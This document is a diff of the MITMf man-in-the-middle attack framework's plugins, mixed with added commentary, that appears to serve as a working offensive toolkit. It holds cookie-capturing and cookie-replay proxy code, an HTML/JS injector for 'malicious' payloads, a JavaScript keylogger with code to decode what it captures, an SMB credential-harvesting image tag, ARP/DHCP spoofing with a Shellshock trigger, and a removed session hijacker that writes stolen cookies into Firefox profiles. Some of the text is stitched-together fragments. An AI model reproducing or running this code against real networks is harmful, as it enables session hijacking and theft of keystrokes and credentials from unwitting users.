# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

import logging

from plugins.plugin import Plugin
from twisted.internet import reactor
from twisted.web import http
from twisted.internet import reactor
from core.ferretNG.FerretProxy import FerretProxy
from core.ferretNG.URLMonitor import URLMonitor

mitmf_logger = logging.getLogger("mitmf")

class FerretNG(Plugin):
name = "Ferret-NG"
optname = "ferret"
desc = "Captures cookies and starts a proxy that will feed them to connected clients"
tree_output = list()
version = "0.1"
has_opts = True

def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.ferret_port = options.ferret_port or 10010

self.tree_output.append("Listening on port {}".format(self.ferret_port))

def clientRequest(self, request):
if 'cookie' in request.headers:
host = request.headers['host']
cookie = request.headers['cookie']
mitmf_logger.info("{} [Ferret-NG] Host: {} Captured cookie: {}".format(request.client.getClientIP(), host, cookie))
URLMonitor.getInstance().cookies[host] = cookie

def pluginReactor(self, StrippingProxy):
FerretFactory = http.HTTPFactory(timeout=10)
FerretFactory.protocol = FerretProxy
reactor.listenTCP(self.ferret_port, FerretFactory)

def pluginOptions(self, options):
options.add_argument('--port', dest='ferret_port', metavar='PORT', type=int, default=None, help='Port to start Ferret-NG on (default 10010)')
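Note: the FerretProxy class itself lives in core/ferretNG/ and is not part of this file's diff. As a rough, hypothetical sketch only (not the actual FerretProxy code), a Twisted proxy listening on the Ferret-NG port could re-attach the per-host cookies that clientRequest() stores, so that a browser pointed at it rides the captured session. Here `captured_cookies` is a stand-in for URLMonitor.getInstance().cookies.

    # Hypothetical sketch, not the shipped core/ferretNG/FerretProxy implementation.
    from twisted.internet import reactor
    from twisted.web import http, proxy

    captured_cookies = {}  # stand-in for URLMonitor.getInstance().cookies ({host: cookie header})

    class CookieReplayRequest(proxy.ProxyRequest):
        def process(self):
            host = self.getHeader('host')
            cookie = captured_cookies.get(host)
            if cookie:
                # replace whatever cookie our own browser sent with the captured one
                self.requestHeaders.setRawHeaders('cookie', [cookie])
            proxy.ProxyRequest.process(self)

    class CookieReplayProxy(proxy.Proxy):
        requestFactory = CookieReplayRequest

    factory = http.HTTPFactory()
    factory.protocol = CookieReplayProxy
    reactor.listenTCP(10010, factory)
    # reactor.run()  # then set this proxy in a browser and visit the same site as the victim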
@@ -27,22 +27,21 @@ import argparse
from core.utils import SystemConfig
from plugins.plugin import Plugin
from plugins.CacheKill import CacheKill
from core.sergioproxy.ProxyPlugins import ProxyPlugins

mitmf_logger = logging.getLogger("mitmf")

class Inject(CacheKill, Plugin):
class Inject(Plugin):
name = "Inject"
optname = "inject"
implements = ["handleResponse", "handleHeader", "connectionMade"]
has_opts = True
desc = "Inject arbitrary content into HTML content"
version = "0.2"
depends = ["CacheKill"]
has_opts = True

def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.proxyip = SystemConfig.getIP(options.interface)
self.our_ip = SystemConfig.getIP(options.interface)
self.html_src = options.html_url
self.js_src = options.js_url
self.rate_limit = options.rate_limit

@@ -50,35 +49,32 @@ class Inject(CacheKill, Plugin):
self.per_domain = options.per_domain
self.black_ips = options.black_ips
self.white_ips = options.white_ips
self.match_str = options.match_str
self.match_str = "</body>" or options.match_str
|
||||
self.html_payload = options.html_payload
self.ctable = {}
self.dtable = {}
self.count = 0
self.mime = "text/html"

if self.options.preserve_cache:
self.implements.remove("handleHeader")
self.implements.remove("connectionMade")
if not options.preserve_cache:
cachekill = CacheKill()
cachekill.initialize(options)
ProxyPlugins.getInstance().addPlugin(cachekill)

if options.html_file is not None:
self.html_payload += options.html_file.read()

self.ctable = {}
self.dtable = {}
self.count = 0
self.mime = "text/html"

def handleResponse(self, request, data):
def serverResponse(self, response, request, data):
#We throttle to only inject once every two seconds per client
#If you have MSF on another host, you may need to check prior to injection
#print "http://" + request.client.getRequestHostname() + request.uri
ip, hn, mime = self._get_req_info(request)
if self._should_inject(ip, hn, mime) and self._ip_filter(ip) and (hn not in self.proxyip):
#print "http://" + response.client.getRequestHostname() + response.uri
ip, hn, mime = self._get_req_info(response)
if self._should_inject(ip, hn, mime) and self._ip_filter(ip) and (hn not in self.our_ip):
if (not self.js_src == self.html_src is not None or not self.html_payload == ""):
data = self._insert_html(data, post=[(self.match_str, self._get_payload())])
self.ctable[ip] = time.time()
self.dtable[ip+hn] = True
self.count += 1
mitmf_logger.info("%s [%s] Injected malicious html" % (ip, hn))

return {'request': request, 'data': data}
mitmf_logger.info("{} [{}] Injected malicious html: {}".format(ip, self.name, hn))

return {'response': response, 'request':request, 'data': data}

def _get_payload(self):
return self._get_js() + self._get_iframe() + self.html_payload

@@ -116,10 +112,10 @@ class Inject(CacheKill, Plugin):

return mime.find(self.mime) != -1

def _get_req_info(self, request):
ip = request.client.getClientIP()
hn = request.client.getRequestHostname()
mime = request.client.headers['Content-Type']
def _get_req_info(self, response):
ip = response.getClientIP()
hn = response.getRequestHostname()
mime = response.headers['Content-Type']
return (ip, hn, mime)

def _get_iframe(self):

@@ -154,12 +150,11 @@ class Inject(CacheKill, Plugin):

return data

def add_options(self, options):
def pluginOptions(self, options):
options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.")
options.add_argument("--html-url", type=str, help="Location of your (presumably) malicious HTML. Injected via hidden iframe.")
options.add_argument("--html-payload", type=str, default="", help="String you would like to inject.")
options.add_argument("--html-file", type=argparse.FileType('r'), default=None, help="File containing code you would like to inject.")
options.add_argument("--match-str", type=str, default="</body>", help="String you would like to match and place your payload before. (</body> by default)")
options.add_argument("--html-payload", type=str, default=None, help="String you would like to inject.")
options.add_argument("--match-str", type=str, default=None, help="String you would like to match and place your payload before. (</body> by default)")
options.add_argument("--preserve-cache", action="store_true", help="Don't kill the server/client caching.")
group = options.add_mutually_exclusive_group(required=False)
group.add_argument("--per-domain", action="store_true", default=False, help="Inject once per domain per client.")
@@ -32,7 +32,7 @@ from plugins.BrowserProfiler import BrowserProfiler

mitmf_logger = logging.getLogger("mitmf")

class JavaPwn(BrowserProfiler, Plugin):
class JavaPwn(Plugin):
name = "JavaPwn"
optname = "javapwn"
desc = "Performs drive-by attacks on clients with out-of-date java browser plugins"
@@ -21,25 +21,29 @@ import logging

from plugins.plugin import Plugin
from plugins.Inject import Inject
from core.sergioproxy.ProxyPlugins import ProxyPlugins

mitmf_logger = logging.getLogger("mitmf")

class jskeylogger(Inject, Plugin):
class jskeylogger(Plugin):
name = "Javascript Keylogger"
optname = "jskeylogger"
desc = "Injects a javascript keylogger into clients webpages"
implements = ["handleResponse", "handleHeader", "connectionMade", "sendPostData"]
depends = ["Inject"]
version = "0.2"
has_opts = False

def initialize(self, options):
Inject.initialize(self, options)
self.html_payload = self.msf_keylogger()
inject = Inject()
inject.initialize(options)
inject.html_payload = self.msf_keylogger()
ProxyPlugins.getInstance().addPlugin(inject)

def sendPostData(self, request):
def clientRequest(self, request):
#Handle the plugin output
if 'keylog' in request.uri:
request.printPostData = False

client_ip = request.client.getClientIP()

raw_keys = request.postData.split("&&")[0]
keys = raw_keys.split(",")

@@ -59,17 +63,12 @@ class jskeylogger(Inject, Plugin):
try:
nice += n.decode('hex')
except:
mitmf_logger.warning("%s ERROR decoding char: %s" % (request.client.getClientIP(), n))
mitmf_logger.error("{} [{}] Error decoding char: {}".format(client_ip, self.name, n))

#try:
# input_field = input_field.decode('hex')
#except:
# mitmf_logger.warning("%s ERROR decoding input field name: %s" % (request.client.getClientIP(), input_field))

mitmf_logger.warning("%s [%s] Field: %s Keys: %s" % (request.client.getClientIP(), request.headers['host'], input_field, nice))
mitmf_logger.info("{} [{}] Host: {} Field: {} Keys: {}".format(client_ip, self.name, request.headers['host'], input_field, nice))

def msf_keylogger(self):
#Stolen from the Metasploit module http_javascript_keylogger
#Stolen from the Metasploit module http_javascript_keylogger, modified to work in Android and IOS

payload = """<script type="text/javascript">
window.onload = function mainfunc(){
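For reference, the POST body the injected keylogger sends is a comma-separated list of hex-encoded keystrokes, followed by "&&" and the input field name, which is what clientRequest() above decodes. A small standalone sketch of that decoding, using an assumed example payload (not data from the plugin):

    # Hypothetical sample of the keylogger POST format: "<hex>,<hex>,...&&<field name>"
    post_data = "68,65,6c,6c,6f&&search"        # assumed example payload

    raw_keys, input_field = post_data.split("&&")
    decoded = ""
    for key in raw_keys.split(","):
        try:
            decoded += key.decode("hex")         # Python 2.7, same call the plugin uses
        except TypeError:
            pass                                 # skip anything that isn't valid hex

    print "Field: {} Keys: {}".format(input_field, decoded)   # -> Field: search Keys: hello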
@@ -19,7 +19,9 @@
#

"""

Plugin by @rubenthijssen

"""

import sys

@@ -28,78 +30,51 @@ import time
import re
from plugins.plugin import Plugin
from plugins.CacheKill import CacheKill
from core.sergioproxy.ProxyPlugins import ProxyPlugins

mitmf_logger = logging.getLogger("mitmf")

class Replace(CacheKill, Plugin):
class Replace(Plugin):
name = "Replace"
optname = "replace"
desc = "Replace arbitrary content in HTML content"
implements = ["handleResponse", "handleHeader", "connectionMade"]
depends = ["CacheKill"]
version = "0.1"
has_opts = True
version = "0.2"
has_opts = False

def initialize(self, options):
self.options = options

self.search_str = options.search_str
self.replace_str = options.replace_str
self.regex_file = options.regex_file

if (self.search_str is None or self.search_str == "") and self.regex_file is None:
sys.exit("[-] Please provide a search string or a regex file")

self.regexes = []
if self.regex_file is not None:
for line in self.regex_file:
self.regexes.append(line.strip().split("\t"))

if self.options.keep_cache:
self.implements.remove("handleHeader")
self.implements.remove("connectionMade")

self.ctable = {}
self.dtable = {}
self.mime = "text/html"

def handleResponse(self, request, data):
ip, hn, mime = self._get_req_info(request)
def serverResponse(self, response, request, data):
ip, hn, mime = self._get_req_info(response)

if self._should_replace(ip, hn, mime):

if self.search_str is not None and self.search_str != "":
data = data.replace(self.search_str, self.replace_str)
mitmf_logger.info("%s [%s] Replaced '%s' with '%s'" % (request.client.getClientIP(), request.headers['host'], self.search_str, self.replace_str))

# Did the user provide us with a regex file?
for regex in self.regexes:
try:
data = re.sub(regex[0], regex[1], data)
for rulename, regexs in self.config['Replace'].iteritems():
for regex1,regex2 in regexs.iteritems():
if re.search(regex1, data):
try:
data = re.sub(regex1, regex2, data)

mitmf_logger.info("%s [%s] Occurances matching '%s' replaced with '%s'" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1]))
except Exception:
logging.error("%s [%s] Your provided regex (%s) or replace value (%s) is empty or invalid. Please debug your provided regex(es)" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1]))
mitmf_logger.info("{} [{}] Host: {} Occurances matching '{}' replaced with '{}' according to rule '{}'".format(ip, self.name, hn, regex1, regex2, rulename))
except Exception:
mitmf_logger.error("{} [{}] Your provided regex ({}) or replace value ({}) is empty or invalid. Please debug your provided regex(es) in rule '{}'" % (ip, hn, regex1, regex2, rulename))
|
||||

self.ctable[ip] = time.time()
self.dtable[ip+hn] = True

return {'request': request, 'data': data}

return

def add_options(self, options):
options.add_argument("--search-str", type=str, default=None, help="String you would like to replace --replace-str with. Default: '' (empty string)")
options.add_argument("--replace-str", type=str, default="", help="String you would like to replace.")
options.add_argument("--regex-file", type=file, help="Load file with regexes. File format: <regex1>[tab]<regex2>[new-line]")
options.add_argument("--keep-cache", action="store_true", help="Don't kill the server/client caching.")
return {'response': response, 'request': request, 'data': data}

def _should_replace(self, ip, hn, mime):
return mime.find(self.mime) != -1

def _get_req_info(self, request):
ip = request.client.getClientIP()
hn = request.client.getRequestHostname()
mime = request.client.headers['Content-Type']
def _get_req_info(self, response):
ip = response.getClientIP()
hn = response.getRequestHostname()
mime = response.headers['Content-Type']

return (ip, hn, mime)
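The rewritten serverResponse() walks a nested mapping of named rules to {search-regex: replacement} pairs taken from the proxy config file instead of CLI options. A minimal standalone sketch of that logic follows; the rule data here is purely illustrative, not taken from the shipped config:

    import re

    # Illustrative rule set mirroring the nested structure iterated above:
    # {rule name: {search regex: replacement}}
    replace_rules = {
        "Regex1": {r"Example Search": "Replaced Search"},
    }

    def apply_replace_rules(data, rules):
        """Apply every configured regex substitution to an HTML body."""
        for rulename, regexes in rules.items():
            for search, repl in regexes.items():
                if re.search(search, data):
                    data = re.sub(search, repl, data)
                    print "Rule '{}' matched: '{}' -> '{}'".format(rulename, search, repl)
        return data

    print apply_replace_rules("<p>Example Search</p>", replace_rules)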
@@ -18,7 +18,6 @@
# USA
#

import threading
import sys

from plugins.plugin import Plugin

@@ -94,7 +93,7 @@ class Responder(Plugin):
def pluginReactor(self, strippingFactory):
reactor.listenTCP(3141, strippingFactory)

def add_options(self, options):
def pluginOptions(self, options):
options.add_argument('--analyze', dest="analyze", action="store_true", help="Allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning")
options.add_argument('--wredir', dest="wredir", default=False, action="store_true", help="Enables answers for netbios wredir suffix queries")
options.add_argument('--nbtns', dest="nbtns", default=False, action="store_true", help="Enables answers for netbios domain suffix queries")
@@ -21,20 +21,22 @@
from core.utils import SystemConfig
from plugins.plugin import Plugin
from plugins.Inject import Inject
from core.sergioproxy.ProxyPlugins import ProxyPlugins

class SMBAuth(Inject, Plugin):
class SMBAuth(Plugin):
name = "SMBAuth"
optname = "smbauth"
desc = "Evoke SMB challenge-response auth attempts"
depends = ["Inject"]
version = "0.1"
has_opts = False

def initialize(self, options):
Inject.initialize(self, options)
self.target_ip = SystemConfig.getIP(options.interface)

self.html_payload = self._get_data()

inject = Inject()
inject.initialize(options)
inject.html_payload = self._get_data()
ProxyPlugins.getInstance().addPlugin(inject)

def _get_data(self):
return '<img src=\"\\\\%s\\image.jpg\">'\
@@ -1,187 +0,0 @@
#!/usr/bin/env python2.7

# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

#Almost all of the Firefox related code was stolen from Firelamb https://github.com/sensepost/mana/tree/master/firelamb
import threading
import os
import sys
import time
import logging
import sqlite3
import json
import socket

from plugins.plugin import Plugin
from core.publicsuffix.publicsuffix import PublicSuffixList
from urlparse import urlparse

mitmf_logger = logging.getLogger("mitmf")

class SessionHijacker(Plugin):
name = "Session Hijacker"
optname = "hijack"
desc = "Performs session hijacking attacks against clients"
implements = ["cleanHeaders"] #["handleHeader"]
version = "0.1"
has_opts = True

def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.psl = PublicSuffixList()
self.firefox = options.firefox
self.mallory = options.mallory
self.save_dir = "./logs"
self.seen_hosts = {}
self.sql_conns = {}
self.sessions = []
self.html_header="<h2>Cookies sniffed for the following domains\n<hr>\n<br>"

#Recent versions of Firefox use "PRAGMA journal_mode=WAL" which requires
#SQLite version 3.7.0 or later. You won't be able to read the database files
#with SQLite version 3.6.23.1 or earlier. You'll get the "file is encrypted
#or is not a database" message.

sqlv = sqlite3.sqlite_version.split('.')
if (sqlv[0] <3 or sqlv[1] < 7):
sys.exit("[-] sqlite3 version 3.7 or greater required")

if not os.path.exists("./logs"):
os.makedirs("./logs")

if self.mallory:
t = threading.Thread(name='mallory_server', target=self.mallory_server, args=())
t.setDaemon(True)
t.start()

def cleanHeaders(self, request): # Client => Server
headers = request.getAllHeaders().copy()
client_ip = request.getClientIP()

if 'cookie' in headers:

if self.firefox:
url = "http://" + headers['host'] + request.getPathFromUri()
for cookie in headers['cookie'].split(';'):
eq = cookie.find("=")
cname = str(cookie)[0:eq].strip()
cvalue = str(cookie)[eq+1:].strip()
self.firefoxdb(headers['host'], cname, cvalue, url, client_ip)

mitmf_logger.info("%s << Inserted cookie into firefox db" % client_ip)

if self.mallory:
if len(self.sessions) > 0:
temp = []
for session in self.sessions:
temp.append(session[0])
if headers['host'] not in temp:
self.sessions.append((headers['host'], headers['cookie']))
mitmf_logger.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie']))
mitmf_logger.info("%s Sent cookie to browser extension" % client_ip)
else:
self.sessions.append((headers['host'], headers['cookie']))
mitmf_logger.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie']))
mitmf_logger.info("%s Sent cookie to browser extension" % client_ip)

#def handleHeader(self, request, key, value): # Server => Client
# if 'set-cookie' in request.client.headers:
# cookie = request.client.headers['set-cookie']
# #host = request.client.headers['host'] #wtf????
# message = "%s Got server cookie: %s" % (request.client.getClientIP(), cookie)
# if self.urlMonitor.isClientLogging() is True:
# self.urlMonitor.writeClientLog(request.client, request.client.headers, message)
# else:
# mitmf_logger.info(message)

def mallory_server(self):
host = ''
port = 20666
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind((host,port))
server.listen(1)
while True:
client, addr = server.accept()
if addr[0] != "127.0.0.1":
client.send("Hacked By China!")
client.close()
continue
request = client.recv(8192)
request = request.split('\n')
path = request[0].split()[1]
client.send("HTTP/1.0 200 OK\r\n")
client.send("Content-Type: text/html\r\n\r\n")
if path == "/":
client.send(json.dumps(self.sessions))
client.close()

def firefoxdb(self, host, cookie_name, cookie_value, url, ip):

session_dir=self.save_dir + "/" + ip
cookie_file=session_dir +'/cookies.sqlite'
cookie_file_exists = os.path.exists(cookie_file)

if (ip not in (self.sql_conns and os.listdir("./logs"))):

try:
if not os.path.exists(session_dir):
os.makedirs(session_dir)

db = sqlite3.connect(cookie_file, isolation_level=None)
self.sql_conns[ip] = db.cursor()

if not cookie_file_exists:
self.sql_conns[ip].execute("CREATE TABLE moz_cookies (id INTEGER PRIMARY KEY, baseDomain TEXT, name TEXT, value TEXT, host TEXT, path TEXT, expiry INTEGER, lastAccessed INTEGER, creationTime INTEGER, isSecure INTEGER, isHttpOnly INTEGER, CONSTRAINT moz_uniqueid UNIQUE (name, host, path))")
self.sql_conns[ip].execute("CREATE INDEX moz_basedomain ON moz_cookies (baseDomain)")
except Exception, e:
print str(e)

scheme = urlparse(url).scheme
scheme = (urlparse(url).scheme)
basedomain = self.psl.get_public_suffix(host)
address = urlparse(url).hostname
short_url = scheme + "://"+ address

log = open(session_dir + '/visited.html','a')
if (ip not in self.seen_hosts):
self.seen_hosts[ip] = {}
log.write(self.html_header)

if (address not in self.seen_hosts[ip]):
self.seen_hosts[ip][address] = 1
log.write("\n<br>\n<a href='%s'>%s</a>" %(short_url, address))

log.close()

if address == basedomain:
address = "." + address

expire_date = 2000000000 #Year2033
now = int(time.time()) - 600
self.sql_conns[ip].execute('INSERT OR IGNORE INTO moz_cookies (baseDomain, name, value, host, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly) VALUES (?,?,?,?,?,?,?,?,?,?)', (basedomain,cookie_name,cookie_value,address,'/',expire_date,now,now,0,0))

def add_options(self, options):
options.add_argument('--firefox', dest='firefox', action='store_true', default=False, help='Create a firefox profile with captured cookies')
options.add_argument('--mallory', dest='mallory', action='store_true', default=False, help='Send cookies to the Mallory cookie injector browser extension')

def finish(self):
if self.firefox:
print "\n[*] To load a session run: 'firefox -profile <client-ip> logs/<client-ip>/visited.html'"
@@ -42,6 +42,7 @@ class Spoof(Plugin):
self.dnscfg = self.config['MITMf']['DNS']
self.dhcpcfg = self.config['Spoof']['DHCP']
self.targets = options.targets
self.arpmode = options.arpmode or 'rep'
self.manualiptables = options.manualiptables
self.mymac = SystemConfig.getMAC(options.interface)
self.myip = SystemConfig.getIP(options.interface)

@@ -66,7 +67,7 @@ class Spoof(Plugin):
self.protocolInstances.append(arpwatch)

arp = ARPpoisoner(options.gateway, options.interface, self.mymac, options.targets)
arp.arpmode = options.arpmode
arp.arpmode = self.arpmode
arp.debug = debug

self.protocolInstances.append(arp)

@@ -116,7 +117,7 @@ class Spoof(Plugin):
for protocol in self.protocolInstances:
protocol.start()

def add_options(self, options):
def pluginOptions(self, options):
group = options.add_mutually_exclusive_group(required=False)
group.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP spoofing')
group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects')

@@ -125,7 +126,7 @@ class Spoof(Plugin):
options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command')
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
options.add_argument('--targets', dest='targets', default=None, help='Specify host/s to poison [if ommited will default to subnet]')
options.add_argument('--arpmode',type=str, dest='arpmode', default='rep', choices=["rep", "req"], help=' ARP Spoofing mode: replies (rep) or requests (req) [default: rep]')
options.add_argument('--arpmode',type=str, dest='arpmode', default=None, choices=["rep", "req"], help=' ARP Spoofing mode: replies (rep) or requests (req) [default: rep]')

def finish(self):
for protocol in self.protocolInstances:
@@ -21,7 +21,7 @@
import logging
from cStringIO import StringIO
from plugins.plugin import Plugin
from PIL import Image
from PIL import Image, ImageFile

mitmf_logger = logging.getLogger("mitmf")

@@ -29,24 +29,22 @@ class Upsidedownternet(Plugin):
name = "Upsidedownternet"
optname = "upsidedownternet"
desc = 'Flips images 180 degrees'
implements = ["handleResponse", "handleHeader"]
version = "0.1"
has_opts = False

def initialize(self, options):
from PIL import Image, ImageFile
globals()['Image'] = Image
globals()['ImageFile'] = ImageFile
self.options = options

def handleHeader(self, request, key, value):
def serverHeaders(self, response, request):
'''Kill the image skipping that's in place for speed reasons'''
if request.isImageRequest:
request.isImageRequest = False
request.isImage = True
request.imageType = value.split("/")[1].upper()
self.imageType = response.headers['content-type'].split('/')[1].upper()

def handleResponse(self, request, data):
def serverResponse(self, response, request, data):
try:
isImage = getattr(request, 'isImage')
except AttributeError:

@@ -54,7 +52,6 @@ class Upsidedownternet(Plugin):

if isImage:
try:
image_type = request.imageType
#For some reason more images get parsed using the parser
#rather than a file...PIL still needs some work I guess
p = ImageFile.Parser()

@@ -62,11 +59,11 @@ class Upsidedownternet(Plugin):
im = p.close()
im = im.transpose(Image.ROTATE_180)
output = StringIO()
im.save(output, format=image_type)
im.save(output, format=self.imageType)
data = output.getvalue()
output.close()
mitmf_logger.info("{} Flipped image".format(request.client.getClientIP()))
mitmf_logger.info("{} [Upsidedownternet] Flipped image".format(response.getClientIP()))
except Exception as e:
mitmf_logger.info("{} Error: {}".format(request.client.getClientIP(), e))
mitmf_logger.info("{} [Upsidedownternet] Error: {}".format(response.getClientIP(), e))

return {'request': request, 'data': data}
return {'response': response, 'request': request, 'data': data}
@@ -11,7 +11,6 @@ class Plugin(ConfigWatcher, object):
name = "Generic plugin"
optname = "generic"
desc = ""
implements = []
has_opts = False

def initialize(self, options):

@@ -19,31 +18,41 @@ class Plugin(ConfigWatcher, object):
self.options = options

def startThread(self, options):
'''Anything that will subclass this function will be a thread'''
'''Anything that will subclass this function will be a thread, passed the options namespace'''
return

def add_options(options):
'''Add your options to the options parser'''
raise NotImplementedError
def clientRequest(self, request):
'''
Handles all outgoing requests, hooks connectionMade()
request object has the following attributes:

def handleHeader(self, request, key, value):
'''Handles all response headers'''
raise NotImplementedError

def connectionMade(self, request):
'''Handles outgoing request'''
raise NotImplementedError

def pluginReactor(self, strippingFactory):
'''This sets up another instance of the reactor on a different port'''
request.headers => headers in dict format
request.command => HTTP method
request.post => POST data
request.uri => full URL
request.path => path
'''
pass

def handleResponse(self, request, data):
def serverHeaders(self, response, request):
'''
Handles all non-image responses by default. See Upsidedownternet
for how to get images
Handles all response headers, hooks handleEndHeaders()
'''
raise NotImplementedError
pass

def serverResponse(self, response, request, data):
'''
Handles all non-image responses by default, hooks handleResponse() (See Upsidedownternet for how to get images)
'''
return {'response': response, 'request':request, 'data': data}

def pluginOptions(self, options):
'''Add your options to the options parser'''
pass

def pluginReactor(self, strippingFactory):
'''This sets up another instance of the reactor on a different port, passed the default factory'''
pass

def finish(self):
'''This will be called when shutting down'''
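Pulling the renamed hooks together, a minimal plugin written against this new base class might look like the sketch below. It is a hypothetical example, not a plugin from this commit: clientRequest() sees outgoing requests, serverHeaders() sees response headers, serverResponse() can rewrite the body, and pluginOptions() registers CLI flags. The --example-note option and the header-to-comment behaviour are assumptions for illustration only.

    # Hypothetical example plugin built on the Plugin base class shown above.
    import logging

    from plugins.plugin import Plugin

    mitmf_logger = logging.getLogger("mitmf")

    class ExamplePlugin(Plugin):
        name     = "Example"
        optname  = "example"
        desc     = "Logs requests and stamps HTML responses with a comment"
        version  = "0.1"
        has_opts = True

        def initialize(self, options):
            self.options = options
            self.note = options.example_note or "hello"   # assumed option, see pluginOptions()
            self.content_type = ""

        def clientRequest(self, request):
            # outgoing client request: method and full URL per the attributes documented above
            mitmf_logger.info("[Example] {} {}".format(request.command, request.uri))

        def serverHeaders(self, response, request):
            # remember the response content type before the body arrives
            self.content_type = response.headers.get('content-type', '')

        def serverResponse(self, response, request, data):
            if 'text/html' in self.content_type:
                data = data.replace("</body>", "<!-- {} --></body>".format(self.note))
            return {'response': response, 'request': request, 'data': data}

        def pluginOptions(self, options):
            options.add_argument("--example-note", dest="example_note", default=None,
                                 help="Comment to append to HTML responses")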